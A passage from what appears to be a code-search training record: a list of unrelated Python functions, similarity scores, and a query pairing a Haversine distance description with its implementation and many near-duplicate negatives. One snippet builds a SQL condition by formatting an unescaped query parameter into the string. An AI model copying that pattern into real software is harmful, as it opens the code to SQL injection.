if varname in varnames_all:\n criteria_all = criteria_all & df.variables.str.contains('.*\\\\b'+varname+'\\\\b.*', regex=True)\n else:\n raise ValueError('ERROR: %s not a valid variable name' % varname)\n\n if site:\n site_all = list(df.site_code.unique())\n if site in site_all:\n criteria_all = criteria_all & df.site_code.str.contains(site, regex=False)\n else:\n raise ValueError('ERROR: %s is not a valid site code' % site)\n\n if featuretype:\n if featuretype in [\"timeseries\", \"profile\", \"timeseriesprofile\"]:\n criteria_all = criteria_all & (df.feature_type.str.lower() == featuretype.lower())\n else:\n raise ValueError('ERROR: %s is not a valid feature type' % featuretype)\n\n if datacategory:\n datacategory_all = list(df.data_category.str.lower().unique())\n if datacategory.lower() in datacategory_all:\n criteria_all = criteria_all & (df.data_category.str.lower() == datacategory.lower())\n else:\n raise ValueError('ERROR: %s is not a valid data category' % datacategory)\n\n if fileversion is not None:\n if fileversion in [0, 1, 2]:\n criteria_all = criteria_all & (df.file_version == fileversion)\n else:\n raise ValueError('ERROR: %s is not a valid file version' % fileversion)\n\n if timestart:\n try:\n criteria_all = criteria_all & (pd.to_datetime(df.time_coverage_end) >= datetime.strptime(timestart, '%Y-%m-%d'))\n except ValueError:\n raise ValueError('ERROR: invalid start date.')\n\n if timeend:\n try:\n criteria_all = criteria_all & (pd.to_datetime(df.time_coverage_start) <= datetime.strptime(timeend, '%Y-%m-%d'))\n except ValueError:\n raise ValueError('ERROR: invalid end date.')\n\n if filterout is not None:\n for keyword in filterout:\n criteria_all = criteria_all & (~df.url.str.contains(keyword, regex=True))\n\n\n return list(WEBROOT + df.url[criteria_all])", "def get_user_referrals(self, username, metric='source', start_date=None, end_date=None):\n\tif not start_date and not end_date:\n\t if metric == 'source':\n\t\tunique_sources = db.session.query(GoogleAnalyticsReferralsModel.source.distinct().label('source')).all()\n\t\tsources = [GoogleAnalyticsReferralsModel.query.filter_by(username=username, source=source).all() for source in unique_sources]\n\t\tsource_counts = []\n\t\tfor source in sources:\n\t\t counts = [s.sessions for s in source]\n\t\t count = sum(counts)\n\t\t source_counts.append(count)\n\t\tsource_names = [source[0].source for source in sources]\n\t\tprint source_counts\n\t\tprint source_names\n\t\tsource_count_list = []\n\t\tfor i in range(len(source_counts)):\n\t\t source_count_dict = {}\n\t\t source = source_names[i]\n\t\t source_count = source_counts[i]\n\t\t source_count_dict['key'] = source\n\t\t source_count_dict['y'] = source_count\n\t\t source_count_list.append(source_count_dict)\n\t\treturn make_response(dumps(source_count_list))\n\n\t elif metric == \"mediums\":\n\t\tunique_mediums = db.session.query(GoogleAnalyticsReferralsModel.medium.distinct().label('medium')).all()\n\t\tmediums = [GoogleAnalyticsReferralsModel.query.filter_by(username=username, medium=medium).all() for medium in unique_mediums]\n\t\tmedium_counts = []\n\t\tfor medium in mediums:\n\t\t counts = [m.sessions for m in medium]\n\t\t count = sum(counts)\n\t\t medium_counts.append(count)\n\t\tmedium_names = [medium[0].medium for medium in mediums]\n\t\tprint medium_counts\n\t\tprint medium_names\n\t\treturn ''", "def wait_for_workers_to_join(self, display, logger, verbose=False):\r\n with self.aggregator:\r\n workers = self.aggregator.get_participants()\r\n\r\n if workers:\r\n if len(workers) == self.Nworkers:\r\n display('Participants have already joined', logger, verbose)\r\n return workers\r\n\r\n display('Waiting for workers to join (%d of %d present)' %(len(workers), self.Nworkers), logger, verbose)\r\n\r\n ready = False\r\n while not ready:\r\n try:\r\n with self.aggregator:\r\n resp = self.aggregator.receive(3000)\r\n participant = resp.notification['participant']\r\n display('Participant %s joined' %participant, logger, verbose)\r\n except Exception as err:\r\n raise err\r\n\r\n if len(workers) == self.Nworkers:\r\n ready = True\r\n\r\n return workers", "def viewAll():\n print(inspect.stack()[1][3])\n query = select([Followup])\n ResultProxy = connection.execute(query)\n ResultSet = ResultProxy.fetchall()\n res = []\n for rs in ResultSet:\n res.append(list_to_json(rs))\n return dict(enumerate(res))", "def api_contest_join():\n contestcode = get_queryparam('code')\n returnJSON = models.select_joined_contest(\n params=('user'),\n conditions=('{}=\\\"{}\\\"'.format(\n settings.DB_COLUMNS.JOINED_CONTEST_CONTEST,\n contestcode\n )\n )\n )\n return jsonify(returnJSON)", "def get(self, *args, **kwargs):\n output = self._base_stats()\n output['connections'] = dict()\n for key in self.application.rabbitmq.keys():\n output['connections'][key] = self.application.rabbitmq[key].stats\n self.write(output)", "def report(session, name: str):\n\n # first find by locus_tag\n count = session.query(Gene).filter(Gene.locus_id == name).count()\n if count == 1:\n locus_tag = name\n elif count == 0:\n # find by primary name\n genes = (session\n .query(Gene)\n .distinct(Gene.id)\n .join(KnowledgebaseGene)\n .filter(KnowledgebaseGene.primary_name == name)).all()\n if len(genes) == 1:\n locus_tag = genes[0].locus_id\n elif len(genes) == 0:\n raise Exception(f'No genes with name {name}')\n else:\n raise Exception(f'Multiple genes with name {name}. '\n 'Try searching by locus tag.')\n if count >= 2:\n raise Exception(f'Multiple genes with locus tag {name}')\n\n quality_df = to_df(\n session.query(KnowledgebaseGene.annotation_quality,\n Knowledgebase.name.label('knowledgebase_name'))\n .join(Knowledgebase)\n .join(Gene)\n .filter(Gene.locus_id == locus_tag)\n )\n\n features_df = to_df(\n session.query(Gene.locus_id,\n KnowledgebaseGene.primary_name,\n Knowledgebase.name.label('knowledgebase_name'),\n KnowledgebaseFeature.feature_type,\n KnowledgebaseFeature.feature)\n .join(KnowledgebaseGene)\n .join(Knowledgebase)\n .join(KnowledgebaseFeature)\n .filter(Gene.locus_id == locus_tag)\n )\n\n features_df = features_df.merge(quality_df, on='knowledgebase_name',\n how='outer')\n\n print(features_df.iloc[0, 0:2])\n\n def make_name(row):\n return f\"{row['knowledgebase_name']} ({row['annotation_quality']})\"\n features_df['knowledgebase_name'] = features_df.apply(make_name, axis=1)\n\n features_df = features_df.drop(\n ['locus_id', 'primary_name', 'annotation_quality'],\n axis=1,\n )\n features_df = features_df.set_index(['knowledgebase_name', 'feature_type'])\n s = features_df.style.set_properties(**{'text-align': 'left'})\n return HTML(s.render())", "def join_draw(request):\n public_draws = MONGO.get_draws_with_filter({\"is_shared\": True})\n context = {'public_draws': public_draws}\n return render(request, 'join_draw.html', context)", "def collect():\n\n stats = {}\n for feed in Feed.objects:\n try:\n logger.info('Fetching from {0}...'.format(feed.ext_url))\n new_articles = fetch(feed)\n stats[feed.ext_url] = len(new_articles)\n\n except SAXException as e:\n if feed.errors is None:\n feed.errors = 0\n\n # Error with the feed, make a note.\n logger.info('Error fetching from {0}.'.format(feed.ext_url))\n feed.errors += 1\n feed.save()\n pretty_stats = json.dumps(stats, sort_keys=True, indent=4)\n notify('Corpora collection complete.', 'Total article count: {0}\\n\\nResults for this pass:\\n{1}'.format(len(Article.objects), pretty_stats))", "def how_much_hours(username, password, workers, projects, start_date, end_date):\n tt = TTrackerSession()\n tt.login(username, password)\n return tt.how_much_hours(workers, projects, start_date, end_date)", "def check_can_join(self, user):\n if not user.is_active or user.is_anonymous():\n return False\n\n membership = self.check_membership(user)\n\n if membership is not None and not membership.is_left():\n return False # Already joined\n\n if self.join_condition == 'A':\n return True\n elif self.join_condition == 'K':\n return user.profile.karma >= self.join_karma_threshold\n elif self.join_condition == 'I':\n return True # Can send a request\n else:\n return False", "def get_statistic():\n\n data = get_data_from_URL(url)[\"data\"]\n results = dict()\n\n for genre in data:\n # get information about one genre\n genre_url = f\"{url}/{genre['id']}/artists\"\n genre_data = get_data_from_URL(genre_url)[\"data\"]\n\n nb_fan = 0\n for artist in genre_data:\n # get information about one artist (number of fans)\n art_data = get_data_from_URL(\n f'https://api.deezer.com/artist/{artist[\"id\"]}')\n nb_fan += art_data[\"nb_fan\"]\n\n # add to dictionary received information\n results[genre[\"name\"]] = (len(genre_data), nb_fan)\n\n return results", "def isJoinRequest(self):\n return self.mhdr.mtype == JOIN_REQUEST", "def test_join_room_socket(self, mock_join):\n mock_join.return_value = '1234'\n response = self.fetch('/rooms/1234', method='GET')\n self.assertTrue(mock_join.called)\n with self.assertJSON(response) as result:\n protocol = 'ws' if self.get_protocol() == 'http' else 'wss'\n expected = '{}://localhost:{}/socket'.format(protocol, self.get_http_port())\n self.assertEqual(result['socket'], expected)\n self.assertIn('user', result)\n self.assertIn('token', result)\n user, token = result['user'], result['token']\n info = jwt.decode(token, 'XXXX')\n self.assertEqual(info['uuid'], user)\n self.assertEqual(info['room'], '1234')", "def server_agent_statistics(ctx):\n data = ctx.obj.get_agent_statistics()\n output_json_data(data)", "def test_get_stats(self):\n pass" ]
[ "0.5480241", "0.53656536", "0.50666654", "0.5061134", "0.49818888", "0.4904676", "0.48338452", "0.48054832", "0.47597033", "0.47334749", "0.4718956", "0.47070545", "0.46772164", "0.46477938", "0.46049055", "0.45803955", "0.45192826", "0.44968593", "0.44656146", "0.44228086", "0.43793604", "0.43723446", "0.43236396", "0.43163905", "0.4316303", "0.43152854", "0.43032235", "0.42919376", "0.42771378", "0.42507434", "0.4206924", "0.4198875", "0.4196055", "0.41920504", "0.4186335", "0.41827902", "0.41808462", "0.4176434", "0.41745952", "0.41690877", "0.41577956", "0.41373917", "0.4137203", "0.41351986", "0.41239807", "0.41230914", "0.41157854", "0.41114938", "0.41089225", "0.41013083", "0.41001183", "0.40963054", "0.40931347", "0.40870857", "0.4085857", "0.4083188", "0.40824693", "0.40805635", "0.407079", "0.40601125", "0.40581277", "0.4056018", "0.4044028", "0.4043855", "0.40393046", "0.40363026", "0.4027476", "0.40202633", "0.4013973", "0.40125403", "0.4011593", "0.40098262", "0.40092412", "0.40081725", "0.4006508", "0.39948177", "0.39908323", "0.39882106", "0.39878753", "0.39875484", "0.39825442", "0.39814815", "0.39792848", "0.39777932", "0.3971436", "0.3970127", "0.39682966", "0.39659464", "0.39626384", "0.39622143", "0.3956733", "0.39560375", "0.395576", "0.39536393", "0.3949954", "0.39464", "0.3945824", "0.39436236", "0.39411995", "0.39402574" ]
0.83031076
0
This is the main function.
def main(argv): parser = OptionParser() parser.add_option( "--output-dir", help="Output directory for generated files. Defaults to chromium root " "directory.") parser.add_option( "-v", "--verbose", action="store_true", help="Verbose logging output.") parser.add_option( "-c", "--check", action="store_true", help="Check if output files match generated files in chromium root " "directory. Use this in PRESUBMIT scripts with --output-dir.") (options, _) = parser.parse_args(args=argv) # This script lives under src/gpu/command_buffer. script_dir = os.path.dirname(os.path.abspath(__file__)) assert script_dir.endswith(os.path.normpath("src/gpu/command_buffer")) # os.path.join doesn't do the right thing with relative paths. chromium_root_dir = os.path.abspath(script_dir + "/../..") # Support generating files under gen/ and for PRESUBMIT. if options.output_dir: output_dir = options.output_dir else: output_dir = chromium_root_dir os.chdir(output_dir) # This script lives under gpu/command_buffer, cd to base directory. build_cmd_buffer_lib.InitializePrefix("WebGPU") gen = build_cmd_buffer_lib.GLGenerator( options.verbose, "2018", _FUNCTION_INFO, _NAMED_TYPE_INFO, chromium_root_dir) gen.ParseGLH("gpu/command_buffer/webgpu_cmd_buffer_functions.txt") gen.WriteCommandIds("gpu/command_buffer/common/webgpu_cmd_ids_autogen.h") gen.WriteFormat("gpu/command_buffer/common/webgpu_cmd_format_autogen.h") gen.WriteFormatTest( "gpu/command_buffer/common/webgpu_cmd_format_test_autogen.h") gen.WriteGLES2InterfaceHeader( "gpu/command_buffer/client/webgpu_interface_autogen.h") gen.WriteGLES2ImplementationHeader( "gpu/command_buffer/client/webgpu_implementation_autogen.h") gen.WriteGLES2InterfaceStub( "gpu/command_buffer/client/webgpu_interface_stub_autogen.h") gen.WriteGLES2InterfaceStubImpl( "gpu/command_buffer/client/webgpu_interface_stub_impl_autogen.h") gen.WriteGLES2Implementation( "gpu/command_buffer/client/webgpu_implementation_impl_autogen.h") gen.WriteGLES2ImplementationUnitTests( "gpu/command_buffer/client/webgpu_implementation_unittest_autogen.h") gen.WriteCmdHelperHeader( "gpu/command_buffer/client/webgpu_cmd_helper_autogen.h") # Note: No gen.WriteServiceImplementation # Note: No gen.WriteServiceUnitTests gen.WriteServiceUtilsHeader( "gpu/command_buffer/service/webgpu_cmd_validation_autogen.h") gen.WriteServiceUtilsImplementation( "gpu/command_buffer/service/" "webgpu_cmd_validation_implementation_autogen.h") build_cmd_buffer_lib.Format(gen.generated_cpp_filenames, output_dir, chromium_root_dir) if gen.errors > 0: print("build_webgpu_cmd_buffer.py: Failed with %d errors" % gen.errors) return 1 check_failed_filenames = [] if options.check: for filename in gen.generated_cpp_filenames: if not filecmp.cmp(os.path.join(output_dir, filename), os.path.join(chromium_root_dir, filename)): check_failed_filenames.append(filename) if len(check_failed_filenames) > 0: print('Please run gpu/command_buffer/build_webgpu_cmd_buffer.py') print('Failed check on autogenerated command buffer files:') for filename in check_failed_filenames: print(filename) return 1 return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main(self):", "def main():\n return", "def main():\n pass", "def main():\n\tpass", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main(self):\r\n pass", "def main(self) -> None:\n pass", "def main():\n\n pass", "def main():\n Main()", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n ...", "def main(args):", "def main(args):", "def main() -> None:\n return", "def main(args=None):", "def main(args=None):", "def main():\n pass", "def main():\n return 0", "def main():\n return 0", "def main(self):\n pass", "def main():\n\n pass\n\n return None", "def main():\n\n pass\n\n return None", "def run():\n main()", "def main():\n print(\"It works!!! ;-)\")\n ###TODO### do something with the various methods/functions of this file", "def main(self, params):\n pass", "def main():\n run_program()", "def main(cls):\n raise NotImplementedError", "def main(ctx, verbose):\n return", "def main():\n print(\"is Running!\")", "def main(args=None):\n pass", "def main(self, **kwargs) -> None:\n ...", "def main():\n example()", "def main():\n example()", "def main():\n example()", "def main():\n example()", "def main():\n print(\"Everythin is ok\")", "def main():\r\n print(\"JoJo\")", "def main():\n produce()", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def main():\n\tcli = Cli()\n\tcli.run()", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def main(source):\n pass" ]
[ "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.9125712", "0.8863137", "0.8862527", "0.88110864", "0.86527646", "0.8560629", "0.8560629", "0.8560629", "0.8560629", "0.8560105", "0.8322307", "0.8237105", "0.8202578", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.8197788", "0.81902087", "0.81512976", "0.81512976", "0.8074574", "0.8064473", "0.8064473", "0.7900137", "0.78820544", "0.78820544", "0.7854387", "0.78442204", "0.78442204", "0.76672214", "0.7635493", "0.7456157", "0.74527043", "0.7435258", "0.7416191", "0.7351965", "0.73471636", "0.7305677", "0.7298485", "0.7298485", "0.7298485", "0.7298485", "0.7218086", "0.72115856", "0.7200565", "0.71952176", "0.71952176", "0.71952176", "0.7163458", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.7154568", "0.71185845" ]
0.0
-1
Compute Haversine distance between points. LatLongDistance(p1, p2) returns distance in meters between points p1 and p2. A point p is a list/array p=[longitude, latitude]
def latlong_distance(p1, p2): radius = 6371 # km lat1 = p1[1] * math.pi / 180.0 lat2 = p2[1] * math.pi / 180.0 lon1 = p1[0] * math.pi / 180.0 lon2 = p2[0] * math.pi / 180.0 deltaLat = lat2 - lat1 deltaLon = lon2 - lon1 a = (math.sin(deltaLat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(deltaLon / 2)**2) c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a)) d = radius * c d = d * 1e3 # Return in m return d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def haversine(point_1, \n point_2):\n # Specify the radius of the Earth in kilometers\n earth_radius = 6372.8\n # Extract latitudes and longitudes from the provided points\n latitude_1 = point_1[0]\n latitude_2 = point_2[0]\n longitude_1 = point_1[1]\n longitude_2 = point_2[1]\n # Convert the latitudes and longitudes to radians\n latitude_1, longitude_1 = np.radians((latitude_1, longitude_1))\n latitude_2, longitude_2 = np.radians((latitude_2, longitude_2))\n # Calculate the differences between latitudes in radians\n latitude_difference = latitude_2 - latitude_1\n # Calculate the differences between longitudes in radians\n longitude_difference = longitude_2 - longitude_1\n # Calculate the haversine distance between the coordinates\n step_1 = np.square(np.sin(np.multiply(latitude_difference, 0.5)))\n step_2 = np.square(np.sin(np.multiply(longitude_difference, 0.5)))\n step_3 = np.multiply(np.cos(latitude_1), np.cos(latitude_2))\n step_4 = np.arcsin(np.sqrt(step_1 + np.multiply(step_2, step_3)))\n haversine_distance = np.multiply(np.multiply(2, earth_radius), step_4)\n # Return the computed haversine distance for the coordinates\n return haversine_distance", "def haversine_distance(df, lat1, long1, lat2, long2):\n r = 6371 # average radius of Earth in kilometers\n phi1 = np.radians(df[lat1])\n phi2 = np.radians(df[lat2])\n\n delta_phi = np.radians(df[lat2] - df[lat1])\n delta_lamda = np.radians(df[long2] - df[long1])\n\n a = np.sin(delta_phi/2) ** 2 + np.cos(phi1) * np.cos(phi2) * \\\n np.sin(delta_lamda / 2) * np.sin(delta_lamda / 2)\n c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a))\n d = (r * c) # in kilometers\n\n return d", "def haversine(p1, p2):\n # Convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(np.radians, [p1[0], p1[1], p2[0], p2[1]])\n \n # Haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(np.sqrt(a)) \n r = 6371 \n \n return c * r", "def distance_gps(point1, point2):\n return haversine_distance(point1.get_latitude(), point1.get_longitude(),\n point2.get_latitude(), point2.get_longitude())", "def haversine_dist(lat1, lng1, lat2, lng2):\n R = 6371 # mean radius of earth in kms\n # convert decimal degrees to radians \n lng1, lat1, lng2, lat2 = map(radians, [lng1, lat1, lng2, lat2])\n # haversine formula \n dlon = lng2 - lng1 \n dlat = lat2 - lat1 \n a = (sin(dlat/2))**2 + cos(lat1) * cos(lat2) * (sin(dlon/2))**2\n c = 2 * atan2(sqrt(a), sqrt(1-a))\n km = R * c\n return km", "def haversine_distance(self, end_point):\n \n dlng = math.radians(end_point.lng - self.lng) \n dlat = math.radians(end_point.lat - self.lat)\n # a is the square of half the chord length between the points.'''\n a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos( math.radians(self.lat) ) * math.cos( math.radians(end_point.lat) ) * math.sin(dlng/2) * math.sin(dlng/2)\n # Account for rounding errors. If a is very close to 1 set it to one to avoid domain exception.'''\n if math.fabs(1-a) < 1e-10:\n a = 1\n # c is the angular distance in radians between the points.'''\n x = math.sqrt(1-a)\n y = math.sqrt(a)\n c = 2 * math.atan2(y, x)\n return A_WGS84 * c", "def haversine_np(lon1, lat1, lon2, lat2):\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = np.sin(dlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2.0)**2\n\n c = 2 * np.arcsin(np.sqrt(a))\n km = 6367 * c\n\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1 = math.radians(lon1)\n lat1 = math.radians(lat1)\n lon2 = math.radians(lon2)\n lat2 = math.radians(lat2)\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n hav_a = (math.sin(dlat/2)**2\n + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2)\n hav_c = 2 * math.asin(math.sqrt(hav_a))\n\n # 6367 km is the radius of the Earth\n dist_km = 6371 * hav_c\n return dist_km", "def haversine(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = float(lon1), float(lat1), float(lon2), float(lat2)\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n m = 6371 * c * 1000\n return m", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = \\\n [math.radians(deg) for deg in [lon1, lat1, lon2, lat2]]\n # haversine formula \n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * \\\n math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n meters = 6367 * c * 1000\n return meters", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n # Radius of earth in kilometers is 6371\n m = 6371000* c #meters\n return m", "def haversine(lon1, lat1, lon2, lat2): \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) \r\n #print 34\r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2 \r\n c = 2 * atan(sqrt(a)/sqrt(1-a)) \r\n r = 6371 \r\n d=c * r\r\n #print type(d)\r\n return d", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n m = 6371 * c * 1000\n return m", "def haversine(p1=None, p2=None):\n lat1, lon1 = p1\n lat2, lon2 = p2\n p = pi/180\n a = 0.5 - cos((lat2-lat1)*p)/2 + cos(lat1*p) * cos(lat2*p) * (1-cos((lon2-lon1)*p))/2 \n return 12742 * asin(sqrt(a)) #2*R*asin...", "def haversine(lat1, lng1, lat2, lng2):\n lat1, lng1, lat2, lng2 = map(np.radians, (lat1, lng1, lat2, lng2))\n AVG_EARTH_RADIUS = 6371 # in km\n lat = lat2 - lat1\n lng = lng2 - lng1\n d = np.sin(lat * 0.5) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(lng * 0.5) ** 2\n h = 2 * AVG_EARTH_RADIUS * np.arcsin(np.sqrt(d))\n return(h)", "def haversine(lat1, lon1, lat2, lon2):\n\t\t # convert decimal degrees to radians \n\t\t lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\t\t # haversine formula \n\t\t dlon = lon2 - lon1 \n\t\t dlat = lat2 - lat1 \n\t\t a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\t\t c = 2 * asin(sqrt(a)) \n\t\t km = 6367 * c\n\t\t return km", "def distance(gps1, gps2):\n return haversine(gps1.lng, gps1.lat, gps2.lng, gps2.lat)", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = list(map(radians, [lon1, lat1, lon2, lat2]))\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n m = 1000. * km\n return m", "def haversine(lon1, lat1, lon2, lat2):\r\n # convert decimal degrees to radians\r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n # haversine formula\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a))\r\n km = 6367 * c\r\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2\n c = 2 * math.asin(math.sqrt(a)) \n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\r\n # convert decimal degrees to radians \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n # haversine formula \r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a)) \r\n km = 6367 * c\r\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # https://stackoverflow.com/questions/15736995/how-can-i-quickly-estimate-the-distance-between-two-latitude-longitude-points\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371 * c\n return km", "def haversine(p,q):\n lng1, lat1 = p\n lng2, lat2 = q\n dlng = abs(lng2-lng1)\n dlat = abs(lat2-lat1)\n\n a = np.sin(0.5*dlng)**2 + np.cos(lng1)*np.cos(lng2)*np.sin(0.5*dlat)**2\n c = 2 * np.arctan2(np.sqrt(a),np.sqrt(1-a))\n return c*6371 # earth radius", "def haversine(gps1, gps2):\n (lon1, lat1) = gps1\n (lon2, lat2) = gps2\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = list(map(radians, [lon1, lat1, lon2, lat2]))\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km", "def haversine(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n # Radius of earth in kilometers is 6371\n km = 6371* c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - 